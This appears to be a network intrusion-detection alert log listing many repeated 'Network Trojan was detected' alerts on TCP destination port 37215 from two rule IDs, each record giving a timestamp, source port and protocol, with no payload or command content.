              Timestamp:06/13/24-21:32:05.378305
              SID:2835222
              Source Port:39350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245247
              SID:2835222
              Source Port:40618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438263
              SID:2829579
              Source Port:50098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.748951
              SID:2829579
              Source Port:49372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478339
              SID:2835222
              Source Port:55220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273816
              SID:2829579
              Source Port:54318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349834
              SID:2835222
              Source Port:38190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279433
              SID:2835222
              Source Port:47926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572611
              SID:2835222
              Source Port:58728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729661
              SID:2829579
              Source Port:55484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090207
              SID:2829579
              Source Port:55684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421733
              SID:2829579
              Source Port:44806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788582
              SID:2829579
              Source Port:39084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048393
              SID:2835222
              Source Port:50674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255498
              SID:2835222
              Source Port:55330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884925
              SID:2829579
              Source Port:35334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055392
              SID:2835222
              Source Port:35714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229112
              SID:2829579
              Source Port:55194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671762
              SID:2829579
              Source Port:50962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544283
              SID:2829579
              Source Port:53442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027845
              SID:2829579
              Source Port:46210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868500
              SID:2829579
              Source Port:60348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404410
              SID:2829579
              Source Port:39548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304400
              SID:2835222
              Source Port:35308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730094
              SID:2835222
              Source Port:37912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940779
              SID:2829579
              Source Port:41344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100673
              SID:2829579
              Source Port:40616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198846
              SID:2835222
              Source Port:49718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043442
              SID:2829579
              Source Port:38972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487194
              SID:2829579
              Source Port:33712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832090
              SID:2835222
              Source Port:53972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370846
              SID:2835222
              Source Port:60958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376360
              SID:2829579
              Source Port:60042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708924
              SID:2835222
              Source Port:34944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373058
              SID:2829579
              Source Port:44090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995301
              SID:2829579
              Source Port:52782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567013
              SID:2835222
              Source Port:33706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913124
              SID:2835222
              Source Port:46360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369749
              SID:2835222
              Source Port:39500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675869
              SID:2835222
              Source Port:35918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401125
              SID:2835222
              Source Port:56538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506665
              SID:2835222
              Source Port:58536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078314
              SID:2835222
              Source Port:37730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833653
              SID:2829579
              Source Port:44880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503202
              SID:2835222
              Source Port:37432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159097
              SID:2835222
              Source Port:34858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909618
              SID:2835222
              Source Port:49298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401671
              SID:2829579
              Source Port:35046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224949
              SID:2829579
              Source Port:58562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729057
              SID:2829579
              Source Port:39672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834592
              SID:2835222
              Source Port:55510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823899
              SID:2835222
              Source Port:33760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400927
              SID:2835222
              Source Port:50612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510209
              SID:2829579
              Source Port:33056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696537
              SID:2835222
              Source Port:51256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.938285
              SID:2835222
              Source Port:57394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508292
              SID:2835222
              Source Port:54532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040132
              SID:2829579
              Source Port:39496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455012
              SID:2829579
              Source Port:53078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276232
              SID:2835222
              Source Port:48822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166197
              SID:2835222
              Source Port:44476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011222
              SID:2829579
              Source Port:34824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089484
              SID:2829579
              Source Port:56356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215297
              SID:2835222
              Source Port:56304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885479
              SID:2829579
              Source Port:36444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195380
              SID:2829579
              Source Port:43818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439590
              SID:2835222
              Source Port:50198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096315
              SID:2835222
              Source Port:60358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153118
              SID:2835222
              Source Port:43760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408784
              SID:2829579
              Source Port:34314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300734
              SID:2835222
              Source Port:45886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216551
              SID:2835222
              Source Port:52214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993543
              SID:2829579
              Source Port:43678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.615193
              SID:2835222
              Source Port:34180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060356
              SID:2835222
              Source Port:59768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475108
              SID:2835222
              Source Port:39396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347545
              SID:2829579
              Source Port:60298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102106
              SID:2835222
              Source Port:60270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027174
              SID:2835222
              Source Port:49682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304274
              SID:2829579
              Source Port:43068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.319987
              SID:2835222
              Source Port:42848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370310
              SID:2829579
              Source Port:43324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726394
              SID:2835222
              Source Port:43714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344134
              SID:2829579
              Source Port:39728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400683
              SID:2829579
              Source Port:39478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614580
              SID:2829579
              Source Port:48594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485533
              SID:2829579
              Source Port:39448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456472
              SID:2835222
              Source Port:53544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477207
              SID:2829579
              Source Port:44756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195923
              SID:2829579
              Source Port:41780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349796
              SID:2835222
              Source Port:48600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164285
              SID:2829579
              Source Port:46922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731810
              SID:2835222
              Source Port:38576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168261
              SID:2829579
              Source Port:47214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419958
              SID:2835222
              Source Port:57456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303913
              SID:2829579
              Source Port:42038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676000
              SID:2829579
              Source Port:52508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524005
              SID:2835222
              Source Port:39872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543800
              SID:2835222
              Source Port:48888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127391
              SID:2829579
              Source Port:46894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659421
              SID:2829579
              Source Port:42156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054907
              SID:2829579
              Source Port:54104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132358
              SID:2835222
              Source Port:57162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174323
              SID:2829579
              Source Port:43492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160237
              SID:2835222
              Source Port:34548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753662
              SID:2829579
              Source Port:60164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567942
              SID:2829579
              Source Port:33526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210456
              SID:2829579
              Source Port:46230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216642
              SID:2829579
              Source Port:38212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870887
              SID:2829579
              Source Port:55156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401003
              SID:2829579
              Source Port:37596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153934
              SID:2835222
              Source Port:45188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243713
              SID:2829579
              Source Port:41620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402399
              SID:2829579
              Source Port:56306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608885
              SID:2835222
              Source Port:54450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372966
              SID:2835222
              Source Port:40186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994769
              SID:2829579
              Source Port:42742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299012
              SID:2829579
              Source Port:56362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262514
              SID:2829579
              Source Port:40806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753799
              SID:2829579
              Source Port:53904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132502
              SID:2829579
              Source Port:40356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095292
              SID:2829579
              Source Port:35996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823265
              SID:2829579
              Source Port:41650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884969
              SID:2829579
              Source Port:48260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503695
              SID:2835222
              Source Port:36012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174531
              SID:2829579
              Source Port:40836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301037
              SID:2835222
              Source Port:53146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632605
              SID:2829579
              Source Port:50362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253992
              SID:2829579
              Source Port:47574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551314
              SID:2835222
              Source Port:53160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678465
              SID:2829579
              Source Port:45696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212998
              SID:2829579
              Source Port:59576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678212
              SID:2829579
              Source Port:40872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403510
              SID:2829579
              Source Port:41202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674645
              SID:2829579
              Source Port:38306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407020
              SID:2835222
              Source Port:34056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301649
              SID:2835222
              Source Port:41988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487968
              SID:2835222
              Source Port:60304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.938746
              SID:2835222
              Source Port:39148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844199
              SID:2835222
              Source Port:33762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297731
              SID:2835222
              Source Port:55518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452689
              SID:2835222
              Source Port:50420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822178
              SID:2835222
              Source Port:47384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543324
              SID:2829579
              Source Port:51990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112128
              SID:2829579
              Source Port:34486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409809
              SID:2835222
              Source Port:37588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156147
              SID:2835222
              Source Port:35530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417688
              SID:2835222
              Source Port:51402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263719
              SID:2829579
              Source Port:32870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457191
              SID:2835222
              Source Port:38766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415360
              SID:2835222
              Source Port:34274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697251
              SID:2835222
              Source Port:60238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238447
              SID:2835222
              Source Port:53904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266820
              SID:2829579
              Source Port:42742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168435
              SID:2829579
              Source Port:60138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010880
              SID:2829579
              Source Port:56146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343744
              SID:2835222
              Source Port:37342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659582
              SID:2829579
              Source Port:42838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277722
              SID:2829579
              Source Port:46768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543980
              SID:2835222
              Source Port:49586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074013
              SID:2829579
              Source Port:44276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419079
              SID:2829579
              Source Port:43636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127246
              SID:2835222
              Source Port:55344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458627
              SID:2829579
              Source Port:36866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610959
              SID:2829579
              Source Port:55394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304174
              SID:2829579
              Source Port:34072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181744
              SID:2829579
              Source Port:37078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607135
              SID:2829579
              Source Port:42570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805701
              SID:2829579
              Source Port:54714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354814
              SID:2835222
              Source Port:53582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055420
              SID:2829579
              Source Port:40412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709485
              SID:2835222
              Source Port:33272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568419
              SID:2835222
              Source Port:33722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611579
              SID:2829579
              Source Port:44418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.402981
              SID:2835222
              Source Port:37644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213232
              SID:2829579
              Source Port:58598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453554
              SID:2829579
              Source Port:35668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660167
              SID:2829579
              Source Port:56748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975366
              SID:2835222
              Source Port:42540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318060
              SID:2829579
              Source Port:42314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638615
              SID:2835222
              Source Port:55494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832249
              SID:2835222
              Source Port:55922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569420
              SID:2835222
              Source Port:60076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194516
              SID:2835222
              Source Port:37284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165367
              SID:2829579
              Source Port:39598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265969
              SID:2835222
              Source Port:54640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419762
              SID:2829579
              Source Port:45706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832417
              SID:2829579
              Source Port:60100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458228
              SID:2835222
              Source Port:51586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350508
              SID:2835222
              Source Port:50742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153610
              SID:2829579
              Source Port:57028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.453993
              SID:2829579
              Source Port:38102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373473
              SID:2835222
              Source Port:52524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610981
              SID:2829579
              Source Port:43482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.101266
              SID:2829579
              Source Port:58156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440350
              SID:2829579
              Source Port:46762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214209
              SID:2835222
              Source Port:33256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093048
